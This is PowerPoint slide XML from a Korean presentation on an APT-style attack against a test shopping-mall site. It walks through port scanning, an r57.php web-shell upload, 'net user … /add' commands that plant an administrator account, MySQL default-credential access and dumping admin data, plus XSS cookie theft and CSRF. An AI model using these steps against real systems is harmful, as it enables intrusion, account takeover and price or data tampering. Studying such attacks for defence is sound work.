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90" r:id="rId2"/>
    <p:sldId id="258" r:id="rId3"/>
    <p:sldId id="277" r:id="rId4"/>
    <p:sldId id="305" r:id="rId5"/>
    <p:sldId id="292" r:id="rId6"/>
    <p:sldId id="303" r:id="rId7"/>
    <p:sldId id="342" r:id="rId8"/>
    <p:sldId id="293" r:id="rId9"/>
    <p:sldId id="306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294" r:id="rId22"/>
    <p:sldId id="320" r:id="rId23"/>
    <p:sldId id="346" r:id="rId24"/>
    <p:sldId id="347" r:id="rId25"/>
    <p:sldId id="321" r:id="rId26"/>
    <p:sldId id="348" r:id="rId27"/>
    <p:sldId id="349" r:id="rId28"/>
    <p:sldId id="350" r:id="rId29"/>
    <p:sldId id="296" r:id="rId30"/>
    <p:sldId id="322" r:id="rId31"/>
    <p:sldId id="323" r:id="rId32"/>
    <p:sldId id="324" r:id="rId33"/>
    <p:sldId id="325" r:id="rId34"/>
    <p:sldId id="326" r:id="rId35"/>
    <p:sldId id="327" r:id="rId36"/>
    <p:sldId id="297" r:id="rId37"/>
    <p:sldId id="329" r:id="rId38"/>
    <p:sldId id="328" r:id="rId39"/>
    <p:sldId id="330" r:id="rId40"/>
    <p:sldId id="300" r:id="rId41"/>
    <p:sldId id="338" r:id="rId42"/>
    <p:sldId id="339" r:id="rId43"/>
    <p:sldId id="340" r:id="rId44"/>
    <p:sldId id="331" r:id="rId45"/>
    <p:sldId id="332" r:id="rId46"/>
    <p:sldId id="333" r:id="rId47"/>
    <p:sldId id="301" r:id="rId48"/>
    <p:sldId id="334" r:id="rId49"/>
    <p:sldId id="335" r:id="rId50"/>
    <p:sldId id="351" r:id="rId51"/>
    <p:sldId id="336" r:id="rId52"/>
    <p:sldId id="337" r:id="rId53"/>
    <p:sldId id="298" r:id="rId54"/>
    <p:sldId id="352" r:id="rId55"/>
    <p:sldId id="353" r:id="rId56"/>
    <p:sldId id="354" r:id="rId57"/>
    <p:sldId id="341" r:id="rId58"/>
    <p:sldId id="355" r:id="rId59"/>
    <p:sldId id="356" r:id="rId60"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="6858000" type="screen4x3"/>
  <p:notesSz cx="6797675" cy="9926638"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Aharoni" panose="02010803020104030203" pitchFamily="2" charset="-79"/>
      <p:bold r:id="rId63"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
      <p:regular r:id="rId64"/>
      <p:bold r:id="rId65"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="나눔명조 ExtraBold" panose="020B0600000101010101" charset="-127"/>
      <p:bold r:id="rId66"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="나눔고딕" panose="020B0600000101010101" charset="-127"/>
      <p:regular r:id="rId67"/>
      <p:bold r:id="rId68"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="나눔고딕 ExtraBold" panose="020B0600000101010101" charset="-127"/>
      <p:bold r:id="rId6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2D2D2D"/>
    <a:srgbClr val="373737"/>
    <a:srgbClr val="323232"/>
    <a:srgbClr val="282828"/>
    <a:srgbClr val="00D0C6"/>
    <a:srgbClr val="0082B0"/>
    <a:srgbClr val="00708A"/>
    <a:srgbClr val="106EA8"/>
    <a:srgbClr val="09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6364" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr>
        <p:scale>
          <a:sx n="100" d="100"/>
          <a:sy n="100" d="100"/>
        </p:scale>
        <p:origin x="1134" y="72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091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87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24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90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59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37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066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402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27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03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83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600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958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571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32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779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55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91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913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362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60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2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5428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6217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582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386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2650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3953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878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564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4958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329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9102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8088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592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3088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5679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007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951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394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785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352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696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088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067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37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6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5416"/>
            <a:ext cx="9144000" cy="610362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336" y="5130289"/>
            <a:ext cx="67687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김시운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· </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="9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황성윤 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="9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· </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="9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전제현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|  2017.11</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="9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4077072"/>
            <a:ext cx="8564760" cy="1053217"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" spc="-50" dirty="0" smtClean="0"/>
              <a:t>쇼핑몰 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" spc="-50" dirty="0" smtClean="0"/>
              <a:t>APT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" spc="-50" dirty="0" smtClean="0"/>
              <a:t>공격과</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" spc="-50" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" spc="-50" dirty="0" smtClean="0"/>
              <a:t>취약점 분석</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" b="0" spc="-5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1760" y="1054905"/>
            <a:ext cx="3161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charset="-127"/>
                <a:ea typeface="나눔고딕" panose="020D0604000000000000" charset="-127"/>
                <a:cs typeface="Aharoni" panose="02010803020104030203" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>찾은 포트를 통해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charset="-127"/>
                <a:ea typeface="나눔고딕" panose="020D0604000000000000" charset="-127"/>
                <a:cs typeface="Aharoni" panose="02010803020104030203" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>1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charset="-127"/>
                <a:ea typeface="나눔고딕" panose="020D0604000000000000" charset="-127"/>
                <a:cs typeface="Aharoni" panose="02010803020104030203" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>차 서버를 찾음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charset="-127"/>
                <a:ea typeface="나눔고딕" panose="020D0604000000000000" charset="-127"/>
                <a:cs typeface="Aharoni" panose="02010803020104030203" pitchFamily="2" charset="-79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charset="-127"/>
              <a:ea typeface="나눔고딕" panose="020D0604000000000000" charset="-127"/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441399" y="1932382"/>
            <a:ext cx="4968552" cy="3967281"/>
            <a:chOff x="3083260" y="2211744"/>
            <a:chExt cx="4968552" cy="396728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" t="1417" r="8875" b="27272"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="3083260" y="2211744"/>
              <a:ext cx="4968552" cy="3967281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013434" y="2276872"/>
              <a:ext cx="494670" cy="1825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outerShdw blurRad="101600" dist="76200" algn="t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287982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spc="-50" dirty="0"/>
              <a:t>서버 탐색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427330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776" y="1159218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파일 업로드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실패시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528" b="79593"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2627784" y="1606074"/>
            <a:ext cx="5935359" cy="1827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55776" y="3886764"/>
            <a:ext cx="3546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exe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파일 등록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-&gt;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파일 업로드 경로 찾음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639428" y="4376114"/>
            <a:ext cx="5933228" cy="735242"/>
            <a:chOff x="2639428" y="4376114"/>
            <a:chExt cx="5933228" cy="73524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428" y="4376114"/>
              <a:ext cx="5933228" cy="735242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6372200" y="4797152"/>
              <a:ext cx="1647193" cy="100669"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw blurRad="101600" dist="76200" algn="t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372200" y="4797152"/>
              <a:ext cx="1657703" cy="111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outerShdw blurRad="101600" dist="76200" algn="t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555776" y="5445224"/>
            <a:ext cx="4727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:\APM_Setup\htdocs\upload.php on line 8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287982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spc="-50" dirty="0"/>
              <a:t>서버 탐색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3761896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1760" y="1114248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r57.php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파일을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aaa.exe.php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로 변경 후 등록</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" b="1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찾아낸 업로드 파일 경로를 통해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WebShell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실행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11760" y="2420888"/>
            <a:ext cx="5738136" cy="2690511"/>
            <a:chOff x="2411760" y="2420888"/>
            <a:chExt cx="5738136" cy="269051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375" b="75074"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2411760" y="2420888"/>
              <a:ext cx="5738136" cy="269051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" name="그룹 1"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4932040" y="3095175"/>
              <a:ext cx="2481506" cy="2016224"/>
              <a:chOff x="539552" y="4005064"/>
              <a:chExt cx="2481506" cy="2016224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144" t="43514" r="43295" b="37530"/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="539552" y="4005064"/>
                <a:ext cx="2481506" cy="201622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cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="5" name="직선 연결선 4"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipV="1">
                <a:off x="1376855" y="5013176"/>
                <a:ext cx="1178921" cy="25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직사각형 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5018868" y="2780928"/>
              <a:ext cx="171337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outerShdw blurRad="101600" dist="76200" algn="t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287982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spc="-50" dirty="0"/>
              <a:t>서버 탐색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1704013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760" y="1224182"/>
            <a:ext cx="4940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일정시간이 지나면 업로드 폴더 내 파일 모두 삭제가 됨</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" b="1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업로드 폴더 밖에서 디렉토리 생성 후 재 업로드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462201" y="2553500"/>
            <a:ext cx="6430279" cy="4015227"/>
            <a:chOff x="2462201" y="2553500"/>
            <a:chExt cx="6430279" cy="4015227"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="직사각형 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8637282" y="6337895"/>
              <a:ext cx="2551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fld id="{DEBAA755-0EE0-4EA3-BB8B-A4BF44186FB1}" type="slidenum">
                <a:rPr lang="en-US" altLang="ko-KR" sz="90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나눔고딕" pitchFamily="50" charset="-127"/>
                  <a:ea typeface="나눔고딕" pitchFamily="50" charset="-127"/>
                </a:rPr>
                <a:pPr lvl="0" algn="r"/>
                <a:t>13</a:t>
              </a:fld>
              <a:endPara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7442" b="72064"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2462201" y="2553500"/>
              <a:ext cx="6272273" cy="2901225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5436096" y="2900855"/>
              <a:ext cx="948680" cy="2312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outerShdw blurRad="101600" dist="76200" algn="t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287982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spc="-50" dirty="0"/>
              <a:t>서버 탐색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1791293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3" r="65081" b="8636"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2411760" y="1034721"/>
            <a:ext cx="5688632" cy="403008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3683" y="5301208"/>
            <a:ext cx="3464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 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111 123 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/add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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="16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localgroup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administrators 111 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 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 111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active:yes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287982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spc="-50" dirty="0"/>
              <a:t>서버 탐색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3510375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4" t="39185" r="25230" b="24240"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2411760" y="1157062"/>
            <a:ext cx="5727645" cy="30243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04185"/>
            <a:ext cx="4513059" cy="218616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</a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12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287982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spc="-50" dirty="0"/>
              <a:t>서버 탐색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1180388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411760" y="2090252"/>
            <a:ext cx="5658640" cy="4363059"/>
            <a:chOff x="1691680" y="2090252"/>
            <a:chExt cx="5658640" cy="436305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80" y="2090252"/>
              <a:ext cx="5658640" cy="4363059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2144748" y="3079470"/>
              <a:ext cx="1296144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outerShdw blurRad="101600" dist="76200" algn="t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987824" y="5085184"/>
              <a:ext cx="1440160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outerShdw blurRad="101600" dist="76200" algn="t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11760" y="1161938"/>
            <a:ext cx="4774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원격 접속된 서버 안에서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SuperScan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으로 사설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IP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확인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0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287982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spc="-50" dirty="0"/>
              <a:t>서버 탐색</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1800" b="1" spc="-50" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="직사각형 11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</a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="328582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1760" y="1172974"/>
            <a:ext cx="4469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Nmap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을 사용해 찾은 사설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IP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의 열린 포트를 찾음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19782" b="61330"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2428528" y="1966669"/>
            <a:ext cx="5239816" cy="2686467"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8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287982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spc="-50" dirty="0"/>
              <a:t>서버 탐색</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1800" b="1" spc="-50" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="직사각형 8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</a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3125547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3683" y="1103617"/>
            <a:ext cx="308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WINDOW7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에서는 접속이 안된다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50026" b="50732"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2301259" y="2132856"/>
            <a:ext cx="6243462" cy="3384376"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9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287982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spc="-50" dirty="0"/>
              <a:t>서버 탐색</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1800" b="1" spc="-50" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="직사각형 10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</a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2568600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4551" y="1054905"/>
            <a:ext cx="4300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SocketTunnel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을 사용해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112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포트로 연결해준다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167" y="1844824"/>
            <a:ext cx="4104456" cy="39369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</a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9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287982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spc="-50" dirty="0"/>
              <a:t>서버 탐색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3995257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2308126" y="2199437"/>
            <a:ext cx="237626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   </a:t>
            </a:r>
            <a:r>
              <a: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APT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   Check List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2318" y="1869495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lang="ko-KR" altLang="en-US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서론</a:t>
            </a:r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312318" y="3031148"/>
            <a:ext cx="2592288" cy="894988"/>
            <a:chOff x="2312318" y="2101721"/>
            <a:chExt cx="2592288" cy="894988"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="TextBox 34"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2312318" y="210172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3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결론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17651" y="2442711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3-1 </a:t>
              </a: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Check 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List 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3-2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결론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464671" y="1869098"/>
            <a:ext cx="2592288" cy="2049150"/>
            <a:chOff x="5464671" y="939671"/>
            <a:chExt cx="2592288" cy="2049150"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="41" name="TextBox 40"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5464671" y="93967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  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US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본론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470004" y="1280661"/>
              <a:ext cx="2376264" cy="1708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서버</a:t>
              </a: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탐색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2-2   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관리자 계정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획득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2-3   XSS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2-4   CSRF  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2-5   </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1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세션관리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취약점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2-6   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파일 업로드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/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다운로드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2-7   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SQL </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1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인젝션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쇼핑몰 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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APT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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공격과 취약점 분석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23528" y="893480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mtClean="0"/>
              <a:t>목차</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR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1760" y="1054905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차 서버에 접속 성공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75" b="57400"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2411760" y="1988840"/>
            <a:ext cx="5544616" cy="2664296"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8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287982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spc="-50" dirty="0"/>
              <a:t>서버 탐색</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1800" b="1" spc="-50" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="직사각형 8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</a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1980137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본론</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" b="1" u="sng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쇼핑몰 </a:t>
            </a:r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APT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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공격과 취약점 분석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2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="3800" b="0" spc="-90" dirty="0"/>
              <a:t>관리자 계정 획득</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2301766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792038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b="1" spc="-50" dirty="0" smtClean="0"/>
              <a:t>관리자 권한 획득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  <a:endParaRPr lang="en-US" altLang="ko-KR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0892" y="932642"/>
            <a:ext cx="49199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Blind </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="1" dirty="0" err="1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S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ql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Injection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을 통해서 알아내는 방법도 있지만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‘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구글 해킹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’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을 통해서도 얼마든지 알 수 있다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  <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR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MySql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기본경로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접속 시도 후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초기설정값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입력 시도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42577" y="2965301"/>
            <a:ext cx="4722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초기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설정 값 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그대로여서 보안상의 구멍이 드러났다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0" r="16773" b="21126"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2560651" y="3525426"/>
            <a:ext cx="382941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55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792038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b="1" spc="-50" smtClean="0"/>
              <a:t>관리자 권한 획득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980728"/>
            <a:ext cx="399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DATABASE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 확인 및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확인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771800" y="2077292"/>
            <a:ext cx="5455928" cy="2430992"/>
            <a:chOff x="2615276" y="2092129"/>
            <a:chExt cx="5455928" cy="243099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536"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2615276" y="2092129"/>
              <a:ext cx="2430997" cy="243099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706" r="5007"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="5567536" y="2092129"/>
              <a:ext cx="2503668" cy="2430992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2699792" y="5073109"/>
            <a:ext cx="5396858" cy="646331"/>
            <a:chOff x="2699792" y="5073109"/>
            <a:chExt cx="5396858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699792" y="5081628"/>
              <a:ext cx="2372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Show databases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24060" y="5073109"/>
              <a:ext cx="23725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Use </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" err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mysql</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR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;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR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Show </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" err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tabales</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR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3804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792038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b="1" spc="-50" smtClean="0"/>
              <a:t>관리자 권한 획득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980728"/>
            <a:ext cx="5788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 안의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wiztable_main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관리자 정보 획득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15635" y="2132856"/>
            <a:ext cx="5581014" cy="3028815"/>
            <a:chOff x="1113942" y="1552313"/>
            <a:chExt cx="6916115" cy="375337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942" y="1552313"/>
              <a:ext cx="6916115" cy="3753374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427984" y="4005064"/>
              <a:ext cx="1728192" cy="288032"/>
            </a:xfrm>
            <a:prstGeom prst="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1122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792038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b="1" spc="-50" smtClean="0"/>
              <a:t>관리자 권한 획득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980728"/>
            <a:ext cx="380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방금 전 알아낸 정보로 관리자 계정 로그인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0" t="42958" r="21386" b="5398"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2411760" y="1484784"/>
            <a:ext cx="3456384" cy="2765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939711"/>
            <a:ext cx="182905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71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792038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b="1" spc="-50" smtClean="0"/>
              <a:t>관리자 권한 획득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980728"/>
            <a:ext cx="5147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업로드시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base64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인코딩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하여 저장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되는것을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확인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766827"/>
            <a:ext cx="5449060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02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792038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b="1" spc="-50" smtClean="0"/>
              <a:t>관리자 권한 획득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980728"/>
            <a:ext cx="3264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위즈몰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회원 정보 확인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 가능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417334" y="2204864"/>
            <a:ext cx="6216309" cy="3456384"/>
            <a:chOff x="270987" y="1412776"/>
            <a:chExt cx="8493894" cy="4722763"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="6" name="그룹 5"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="270987" y="1412776"/>
              <a:ext cx="8493894" cy="4722763"/>
              <a:chOff x="270987" y="1412776"/>
              <a:chExt cx="8493894" cy="4722763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987" y="1412776"/>
                <a:ext cx="8493894" cy="2651190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987" y="4306484"/>
                <a:ext cx="8493894" cy="1829055"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="직사각형 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6516216" y="3284984"/>
              <a:ext cx="576064" cy="648072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8705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792038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b="1" spc="-50" smtClean="0"/>
              <a:t>관리자 권한 획득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980728"/>
            <a:ext cx="3661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위즈몰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상품 정보 확인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가격 변경 가능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430230" y="2204864"/>
            <a:ext cx="6293083" cy="3875676"/>
            <a:chOff x="424356" y="1353524"/>
            <a:chExt cx="8468124" cy="5215203"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="직사각형 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8637282" y="6337895"/>
              <a:ext cx="2551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fld id="{DEBAA755-0EE0-4EA3-BB8B-A4BF44186FB1}" type="slidenum">
                <a:rPr lang="en-US" altLang="ko-KR" sz="90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나눔고딕" pitchFamily="50" charset="-127"/>
                  <a:ea typeface="나눔고딕" pitchFamily="50" charset="-127"/>
                </a:rPr>
                <a:pPr lvl="0" algn="r"/>
                <a:t>28</a:t>
              </a:fld>
              <a:endPara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815"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="424356" y="1353524"/>
              <a:ext cx="8357811" cy="305513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56" y="4693856"/>
              <a:ext cx="8357811" cy="1689035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6084168" y="3501008"/>
              <a:ext cx="2376264" cy="907646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68243" y="5013176"/>
              <a:ext cx="438117" cy="576064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333683" y="4979754"/>
              <a:ext cx="438117" cy="576064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149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본론</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" b="1" u="sng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쇼핑몰 </a:t>
            </a:r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APT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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공격과 취약점 분석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/>
              <a:t>3. XSS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4209379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서론</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" b="1" u="sng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쇼핑몰 </a:t>
            </a:r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APT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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공격과 취약점 분석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APT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="3800" b="0" spc="-90" dirty="0"/>
              <a:t>개요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287982" cy="603494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1800" b="1" spc="-50" dirty="0" smtClean="0"/>
              <a:t>XSS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2-3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR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980728"/>
            <a:ext cx="3757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게시판에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 적용되는지 확인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Script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구문 작성 후 확인 위해 게시물 클릭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0" b="17927"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2483768" y="1758815"/>
            <a:ext cx="4860032" cy="23954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11760" y="4185242"/>
            <a:ext cx="2818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&lt;script&gt;alert("test")&lt;/script&gt;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716920"/>
            <a:ext cx="4439270" cy="24768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5157730"/>
            <a:ext cx="4258269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060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287982" cy="603494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1800" b="1" spc="-50" dirty="0" smtClean="0"/>
              <a:t>XSS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056660"/>
            <a:ext cx="3486637" cy="21053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37201" y="988763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XSS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게시물 작성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게시물 관리자가 클릭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46860" y="4653136"/>
            <a:ext cx="55899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쿠키값</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" b="1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17-11-07 17:15:04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PHPSESSID=64351540422cb4277af0e1ce4ecd9fd6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; </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" b="1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phpMyAdmin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=54eb8e7d6a07aedd41b0759dfc36a695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; </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" b="1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ShopListNo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=12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; CART_CODE=150995092528; </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" b="1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usersession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=64351540422cb4277af0e1ce4ecd9fd6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; </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" b="1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MODIFY=15_board01_root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684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287982" cy="603494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1800" b="1" spc="-50" dirty="0" smtClean="0"/>
              <a:t>XSS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1760" y="980728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전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2" b="7511"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2483768" y="1628800"/>
            <a:ext cx="4885514" cy="328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80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287982" cy="603494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1800" b="1" spc="-50" dirty="0" smtClean="0"/>
              <a:t>XSS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1760" y="945157"/>
            <a:ext cx="1672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전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쿠키값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08" y="1977711"/>
            <a:ext cx="4728583" cy="146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29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287982" cy="603494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1800" b="1" spc="-50" dirty="0" smtClean="0"/>
              <a:t>XSS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08829" y="922435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쿠키값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대입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860" y="2132855"/>
            <a:ext cx="4429396" cy="204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05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287982" cy="603494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1800" b="1" spc="-50" dirty="0" smtClean="0"/>
              <a:t>XSS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06414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08829" y="922435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성공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84" b="-7670"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2555776" y="2132856"/>
            <a:ext cx="3816424" cy="293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21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본론</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" b="1" u="sng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쇼핑몰 </a:t>
            </a:r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APT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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공격과 취약점 분석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/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3800" b="0" spc="-90" dirty="0" smtClean="0"/>
              <a:t>. CSRF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2213352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287982" cy="603494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1800" spc="-50" dirty="0"/>
              <a:t>CSRF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06414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08829" y="922435"/>
            <a:ext cx="333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일반계정으로 로그인 후 게시물 클릭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83" y="1520539"/>
            <a:ext cx="2461768" cy="13464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83" y="4293096"/>
            <a:ext cx="6297225" cy="435230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3227806" y="3180193"/>
